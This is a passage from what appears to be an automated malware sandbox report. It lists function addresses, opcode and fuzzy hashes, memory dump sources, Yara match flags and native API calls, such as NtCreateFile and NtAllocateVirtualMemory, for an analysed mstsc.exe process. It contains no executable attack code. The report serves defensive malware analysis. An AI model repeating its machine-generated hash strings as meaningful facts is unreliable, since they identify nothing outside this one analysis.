                                                                        • Instruction ID: 141d5bfbf4eae744b17ea0b0b19bdd9d16f4dfe9d0c216c2f0b29fb1340f3d8a
                                                                        • Opcode Fuzzy Hash: b26858e2ce06f20443228b1259f81fbb752f93464a741f8e2530f06ffa3cd697
                                                                        • Instruction Fuzzy Hash: B490026161154442D14062994814B0F8185A7E1243FD1C019A4186554CC95588656761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 019296D0, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 975b43d984765baa0982a2bbb0993c886140d0261de0792571f72b7a9d78b124
                                                                        • Instruction ID: c9021a21876530b93bb3b43616cc4c3fa1e8048902dd96d345e9781aadc4b894
                                                                        • Opcode Fuzzy Hash: 975b43d984765baa0982a2bbb0993c886140d0261de0792571f72b7a9d78b124
                                                                        • Instruction Fuzzy Hash: 9C90027161110842D10061994414B464085A7E0342F91C016A0154654DC655C8617561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01929610, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c1d7013d6ffbb8267e0d408457a7e0db4867c718cf2dee030006277b02db146f
                                                                        • Instruction ID: 3e0dda3aaa51f3ebd6b044e59335734a548ced5fe445c91a4eb7d6efdbfb1a0f
                                                                        • Opcode Fuzzy Hash: c1d7013d6ffbb8267e0d408457a7e0db4867c718cf2dee030006277b02db146f
                                                                        • Instruction Fuzzy Hash: 54900271A1510802D150719944247464085A7D0342F91C011A0054654DC7958A6576E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01929A10, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2fe9f9ada4df872112199148dc0eddd837f4a5d6080dd1855b3d93d253d80464
                                                                        • Instruction ID: 73e9f320d188ea3f79ff49ad5a27ed0dc3927984ada1d5130019ff7f86ba7e94
                                                                        • Opcode Fuzzy Hash: 2fe9f9ada4df872112199148dc0eddd837f4a5d6080dd1855b3d93d253d80464
                                                                        • Instruction Fuzzy Hash: 1090027161150402D100619948187474085A7D0343F91C011A5194555EC6A5C8A17571
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01929650, Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 67795cc70ba076844573fe49f3edb2ba0294203a00e66d2c242c7ff669dd11f0
                                                                        • Instruction ID: aa4bd14010cb60707b538f73adfaa91e180c99db87e0ae9808f8f246af9dfdac
                                                                        • Opcode Fuzzy Hash: 67795cc70ba076844573fe49f3edb2ba0294203a00e66d2c242c7ff669dd11f0
                                                                        • Instruction Fuzzy Hash: FF90027161514842D14071994414A464095A7D0346F91C011A0094694DD6658D65B6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01929670, Relevance: .0, Instructions: 2COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction ID: 17387ead08ee10de9573033b96520e48e21befe1425d0ec219086c1de7d52164
                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                        • Instruction Fuzzy Hash:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0197FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0197FDFA
                                                                        Strings
                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0197FE01
                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0197FE2B
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                        • API String ID: 885266447-3903918235
                                                                        • Opcode ID: 8faca7e64d17c73a88e3cab995300465b8c6e3289fc7fbefa1f1c270effdc2ff
                                                                        • Instruction ID: be1e839000e0d861026ded0029bb848aa538ec19f7670295436f854e8bb63232
                                                                        • Opcode Fuzzy Hash: 8faca7e64d17c73a88e3cab995300465b8c6e3289fc7fbefa1f1c270effdc2ff
                                                                        • Instruction Fuzzy Hash: 56F0C232200601BBEA201A55DC02E23BB6AEF84B30F150614F628561D1DA62B92096F0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Analysis Process: mstsc.exe PID: 1556 Parent PID: 3424 mstsc.exeCOMMON

                                                                        Executed Functions

                                                                        Function 008581BC, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00853B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00853B97,007A002E,00000000,00000060,00000000,00000000), ref: 0085820D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID: .z`
                                                                        • API String ID: 823142352-1441809116
                                                                        • Opcode ID: 35d0e04d51135159811be6a393b29513907f93852542ae45d805a0eabdef979c
                                                                        • Instruction ID: a0e64fab3b6d945347a56d637d44ddbc566fefdf464469044a03c1dff86f7819
                                                                        • Opcode Fuzzy Hash: 35d0e04d51135159811be6a393b29513907f93852542ae45d805a0eabdef979c
                                                                        • Instruction Fuzzy Hash: 9DF0B2B2200108ABCB08CF88DC94EEB37A9AF8C354F158648FA0DA7240C630E8158BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 008581C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00853B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00853B97,007A002E,00000000,00000060,00000000,00000000), ref: 0085820D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID: .z`
                                                                        • API String ID: 823142352-1441809116
                                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                        • Instruction ID: 9c2a7ca21e39169ca699551a1a6b25ae2137b2048557621c9a7e5a976ddcc5f9
                                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                        • Instruction Fuzzy Hash: 75F0B6B2200108ABCB08CF88DC85DEB77EDAF8C754F158248FA0D97241C630E8118BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0085826A, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtReadFile.NTDLL(00853D52,5E972F59,FFFFFFFF,00853A11,?,?,00853D52,?,00853A11,FFFFFFFF,5E972F59,00853D52,?,00000000), ref: 008582B5
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 86bf7d8902c43609f6d8d41b27b36eae32eede445b013a3d2a9157bf0f28b4be
                                                                        • Instruction ID: b5e47870ce31755d94b847c68e9495f934e5dfe8efd312d4917d81ff40c6c3fa
                                                                        • Opcode Fuzzy Hash: 86bf7d8902c43609f6d8d41b27b36eae32eede445b013a3d2a9157bf0f28b4be
                                                                        • Instruction Fuzzy Hash: FDF01DB6114049ABCB04DF98D894CEBBBA9FF8C354B15878DFD5C97202C534EC558BA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00858270, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtReadFile.NTDLL(00853D52,5E972F59,FFFFFFFF,00853A11,?,?,00853D52,?,00853A11,FFFFFFFF,5E972F59,00853D52,?,00000000), ref: 008582B5
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                        • Instruction ID: c2ccbc54feda646116fd0f3405a5ce569b1074553c2a1efd6cdfe6d15520f623
                                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                        • Instruction Fuzzy Hash: 58F0A9B2200108ABCB14DF89DC81DEB77ADEF8C754F158649BE1D97241DA30E8118BA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 008583A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00842D11,00002000,00003000,00000004), ref: 008583D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                        • Instruction ID: ecbbf20b7762e376a07e70c1345154057b1fd8a9957ccd1d68aaadb580434ef6
                                                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                        • Instruction Fuzzy Hash: 48F015B2200208ABCB14DF89CC81EAB77ADEF88750F118549FE08A7241CA30F810CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 008582F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtClose.NTDLL(00853D30,?,?,00853D30,00000000,FFFFFFFF), ref: 00858315
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                        • Instruction ID: 5005d15e8e2c1c5f4cb77245d2dc59be131ea5309ab78c7a8310ac5d44bc0f3d
                                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                        • Instruction Fuzzy Hash: 18D01275200214ABD710EF98CC45E977BACEF44750F154455BA189B242C930F90086E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 008582EC, Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtClose.NTDLL(00853D30,?,?,00853D30,00000000,FFFFFFFF), ref: 00858315
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 5e884d238d9d915457a81ce0c0a8b3dc3d0b411eb5cf50f491cea9da782711c6
                                                                        • Instruction ID: 6cdb8f623bf5b275af70254a13aa902ca54fda791e587b78d91189fbc953186e
                                                                        • Opcode Fuzzy Hash: 5e884d238d9d915457a81ce0c0a8b3dc3d0b411eb5cf50f491cea9da782711c6
                                                                        • Instruction Fuzzy Hash: E1D02B9D00D2C04FDB10FBB474C10C67F50ED9021431459CFD4A807643C524920993D1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0085839B, Relevance: 1.5, APIs: 1, Instructions: 18memorynativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00842D11,00002000,00003000,00000004), ref: 008583D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: 53bae83d86ce14e6d13f08a541d24fd329580ece7d709ff19f9138e962ba465a
                                                                        • Instruction ID: 51668fb82ed3d2a582c3aac40690bb2013260e999b0ea022e99d498878a4727a
                                                                        • Opcode Fuzzy Hash: 53bae83d86ce14e6d13f08a541d24fd329580ece7d709ff19f9138e962ba465a
                                                                        • Instruction Fuzzy Hash: 5ED0A7B21491486BC718CFD5ACC0CB377ECEFD8620704858FFD498610AC430A4188F70
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04B19860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 18e44fb93fa5aad270dd09bdd5ac37fdd89e20a5cfcf5c04006d6cf18098a59a
                                                                        • Instruction ID: aadce4bdd3f5f817a7516d249a1f8c6034048c592c3b0a5a2fceaafd91bc623b
                                                                        • Opcode Fuzzy Hash: 18e44fb93fa5aad270dd09bdd5ac37fdd89e20a5cfcf5c04006d6cf18098a59a
                                                                        • Instruction Fuzzy Hash: FE90027220101413F11161594604707000DD7D0295FA1C456A4455558D9696D963B161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04B19840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: d72e104a11e230fe87b100249f5ab2b229152e374a16cf83f71b598d7514316d
                                                                        • Instruction ID: 98bc6acbe272fb7cb37a6b6fe311ff18390c1c44772881093ba71006da1ce278
                                                                        • Opcode Fuzzy Hash: d72e104a11e230fe87b100249f5ab2b229152e374a16cf83f71b598d7514316d
                                                                        • Instruction Fuzzy Hash: 76900262242051527545B1594504507400AE7E02957A1C056A5445950C8566E867E661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04B199A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: f435286a3fb61798d12bbf33e204307fe32fe9d0535ec7337129be2dfcfe674a
                                                                        • Instruction ID: 7ccb96052a8e577ecd54fdabe4d7a04c6916db028a26b696e1aa8abb49e6b443
                                                                        • Opcode Fuzzy Hash: f435286a3fb61798d12bbf33e204307fe32fe9d0535ec7337129be2dfcfe674a
                                                                        • Instruction Fuzzy Hash: 689002A234101442F10061594514B060009D7E1355F61C059E5095554D8659DC637166
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04B195D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 6b0aff97c4c9b3f98f0bcce6f938c6c9a3e140ed470db5fdea21c6757b77ce2d
                                                                        • Instruction ID: ddfa1c52bb34fc65fc804d54bdc2c26a3c197e0edc91abb86a10d0b363c46d15
                                                                        • Opcode Fuzzy Hash: 6b0aff97c4c9b3f98f0bcce6f938c6c9a3e140ed470db5fdea21c6757b77ce2d
                                                                        • Instruction Fuzzy Hash: D09002A220201003610571594514616400ED7E0255B61C065E5045590DC565D8A27165
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04B19910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 2ad6775c6f347c939715251afe82a910c8a99211738c8598f21f45cdc0e783d2
                                                                        • Instruction ID: cf067ec8d43ffa225ae75be1fb288ce4f937f40bcde7671b895e20a56227098f
                                                                        • Opcode Fuzzy Hash: 2ad6775c6f347c939715251afe82a910c8a99211738c8598f21f45cdc0e783d2
                                                                        • Instruction Fuzzy Hash: FD9002B220101402F140715945047460009D7D0355F61C055A9095554E8699DDE676A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04B19540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 9b7f151c88a94521a5ddfe9a77ccacfb5036351df4c5a2868c721f747993b250
                                                                        • Instruction ID: 3f404b11f51bc4e7cec6a007c1e141c7cb6d691c219328dd819bcd708ddea8f4
                                                                        • Opcode Fuzzy Hash: 9b7f151c88a94521a5ddfe9a77ccacfb5036351df4c5a2868c721f747993b250
                                                                        • Instruction Fuzzy Hash: 11900266211010032105A5590704507004AD7D53A5361C065F5046550CD661D8726161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04B196E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 74b50141b6ab3cccc8a3461fc1172d25337a7e1f2ea8e369f67a8a5c19cbac66
                                                                        • Instruction ID: fef7a43f6d0977fd74744a486f78e2f13c9f22f0ccb5d2d0b4b1d8278c7070f5
                                                                        • Opcode Fuzzy Hash: 74b50141b6ab3cccc8a3461fc1172d25337a7e1f2ea8e369f67a8a5c19cbac66
                                                                        • Instruction Fuzzy Hash: 3990027220109802F1106159850474A0009D7D0355F65C455A8455658D86D5D8A27161
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04B196D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 0287054960b03c3fe8705112ad9eb88b0e892ab1ad00cba387e2a439feb7d39f
                                                                        • Instruction ID: 786d7de6acc06c52e10e237edf0bd809e7348a4733dc01d9bfd059b378342738
                                                                        • Opcode Fuzzy Hash: 0287054960b03c3fe8705112ad9eb88b0e892ab1ad00cba387e2a439feb7d39f
                                                                        • Instruction Fuzzy Hash: 4190027220101842F10061594504B460009D7E0355F61C05AA4155654D8655D8627561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04B19660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 79d989ff6f6c4c1dc73f22780bd8ab3206f7bfa088aa8ed53e0be610a0d53a9f
                                                                        • Instruction ID: 5e1f945eebfa0c3cf1454ef70a19e868e6377a621a379c3c38e42a2bee56b275
                                                                        • Opcode Fuzzy Hash: 79d989ff6f6c4c1dc73f22780bd8ab3206f7bfa088aa8ed53e0be610a0d53a9f
                                                                        • Instruction Fuzzy Hash: 5F90027220101802F1807159450464A0009D7D1355FA1C059A4056654DCA55DA6A77E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04B19650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 59a8b51470e02af9695503dca85e7ad4fb756c64d1859321a694dffea8763800
                                                                        • Instruction ID: 143a1a6db88e95c1efbf16365fb739df60a0637e5e8c94ad6eb661565e5d12c3
                                                                        • Opcode Fuzzy Hash: 59a8b51470e02af9695503dca85e7ad4fb756c64d1859321a694dffea8763800
                                                                        • Instruction Fuzzy Hash: 1990027220505842F14071594504A460019D7D0359F61C055A4095694D9665DD66B6A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04B19A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 3ba27cfc581e94f53ea851e650f09ed34b49995654109e5958ed07df34bc464e
                                                                        • Instruction ID: 3f8ba48a48b1b78d94d924eed145f7e81dbd98136ba967a642eb5adaf35e78c5
                                                                        • Opcode Fuzzy Hash: 3ba27cfc581e94f53ea851e650f09ed34b49995654109e5958ed07df34bc464e
                                                                        • Instruction Fuzzy Hash: 9A90026221181042F20065694D14B070009D7D0357F61C159A4185554CC955D8726561
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04B19780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 5c75215306b562a2a0e559b7d1e40a9c5205b203d0be75cbbce4c45ae2f4c07a
                                                                        • Instruction ID: 81e0ca3b759e5b29d15ff0830f96879ce90cf6c005b5b9e0c7dd20747301823f
                                                                        • Opcode Fuzzy Hash: 5c75215306b562a2a0e559b7d1e40a9c5205b203d0be75cbbce4c45ae2f4c07a
                                                                        • Instruction Fuzzy Hash: 0490026A21301002F1807159550860A0009D7D1256FA1D459A4046558CC955D87A6361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04B19FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp, Offset: 04AB0000, based on PE: true
                                                                        • Associated: 00000003.00000002.932920969.0000000004BCB000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000003.00000002.932928401.0000000004BCF000.00000040.00000001.sdmp Download File
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: df1e5ef97ba7081523fe544956595929f15e2b99295eb616ffe64419f7346978
                                                                        • Instruction ID: 24db336790bf8a0156a45ec0ed1cc9924d46d996b6a496e44ca75bc7bfc7e8f1
